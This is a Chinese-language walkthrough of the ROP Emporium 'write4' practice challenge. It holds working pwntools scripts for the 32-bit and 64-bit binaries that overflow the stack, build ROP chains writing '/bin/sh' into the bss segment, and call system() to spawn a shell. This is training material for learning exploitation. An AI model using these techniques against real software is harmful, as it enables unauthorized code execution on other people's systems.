ropemporium上的链接
https://ropemporium.com/
32位
checksec后试运行
32位ida
发现栈溢出漏洞
再次发现usefulFunction,找到system在plt地址为0x08048430,但是参数不对
shift+F12找字符串,发现没有想要的
那我们就试着把"sh"写进去bss段(好像说data段也行),因为32位是4个字节,不能一次性传入/bin/sh,当然也可以传入/bin/sh,只是要分两次,可以参考
https://www.jianshu.com/p/d385e23b2a94
https://www.jianshu.com/p/d1059b77d018
ida里ctrl+s可以查看data段和bss段的权限
终端时输入命令
ROPgadget --binary write432 --only "mov|pop|ret"
用ROPgadget找到了两条指令
0x08048670 : mov dword ptr [edi], ebp ; ret
0x080486da : pop edi ; pop ebp ; ret
第一条指令 edi 存的是bss 段的地址,ebp 存的是要写入的数据
第二条指令是指将 ebp 中的内容写到 edi 内存的所在地址
脚本如下
#coding=utf8
from pwn import *
#context.log_level = 'debug'
elf = ELF('./write432')
p = process('./write432')
system_plt = 0x08048430#system_plt = elf.plt['system']
bss = 0x0804A040#bss = elf.bss()
pop_edi_ebp = 0x080486da
mov_edi_ebp = 0x08048670
payload = ''
payload += 0x28*'A'
payload += p32(0)
payload += p32(pop_edi_ebp)
payload += p32(bss)
payload += 'sh\x00\x00'
payload += p32(mov_edi_ebp)
payload += p32(system_plt)
payload += p32(0xdeadbeef)
payload += p32(bss)
p.sendline(payload)
p.interactive()
64位
64位大同小异
输入命令
ROPgadget --binary write4 --only "mov|pop|ret"
我们选用这两条指令,同时控制r14和r15
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
0x0000000000400890 : pop r14 ; pop r15 ; ret
还要用到pop rdi;ret;
0x0000000000400893 : pop rdi ; ret
脚本如下
#coding=utf8
from pwn import *
#context.log_level = 'debug'
elf = ELF('./write4')
p = process('./write4')
system_plt = elf.plt['system']
bss = elf.bss()
pop_r14_r15 = 0x400890
mov_r14_r15 = 0x400820
pop_rdi = 0x400893
payload = ''
payload += 0x20*'A'
payload += p64(0)
payload += p64(pop_r14_r15)
payload += p64(bss)
payload += '/bin/sh\x00'
payload += p64(mov_r14_r15)
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(system_plt)
p.sendline(payload)
p.interactive()
